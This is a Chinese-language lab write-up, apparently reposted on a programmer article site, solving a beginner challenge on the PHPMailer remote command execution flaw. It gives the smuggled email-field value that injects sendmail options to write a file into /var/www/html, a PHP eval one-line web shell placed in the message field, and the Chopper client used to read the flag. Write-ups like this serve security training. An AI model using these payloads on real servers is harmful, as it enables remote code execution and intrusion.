欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

墨者靶场 初级:PHPMailer远程命令执行漏洞溯源

程序员文章站 2022-03-25 13:17:01
...

墨者靶场 初级:PHPMailer远程命令执行漏洞溯源

题目

墨者靶场 初级:PHPMailer远程命令执行漏洞溯源

背景介绍

安全工程师对某网站进行授权测试,发现了一个管理员留下的邮件测试页面,你能帮他完成测试吗

实训目标

1、了解PHPMailer用处;
2、了解Burp suite中Spider模块使用方法;
3、了解PHPMailer远程命令执行漏洞形成原因;
4、了解PHPMailer远程命令执行漏洞利用方法

解题方向

PHPMailer远程命令执行漏洞利用

解题步骤

启动靶场,打开链接访问,是一个显示页面,翻到底部有个邮件链接,点击链接。
墨者靶场 初级:PHPMailer远程命令执行漏洞溯源
看到数据提交的页面,在这里上传shell。
随便输个错误网址,让网页报个错。
墨者靶场 初级:PHPMailer远程命令执行漏洞溯源
可以看到是linux系统搭建的网站,所以路径我们就知道了,插shell。

1.任意用户名
2.在email写入:"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/wanku.php @aaa.com
3.在message写入:<?php eval($_POST[wanku]);?>

提交后,访问wanku.php页面,没有报错。
使用菜刀去连接shell,找到key.txt,得到key值。
墨者靶场 初级:PHPMailer远程命令执行漏洞溯源
提交key值即可,完工。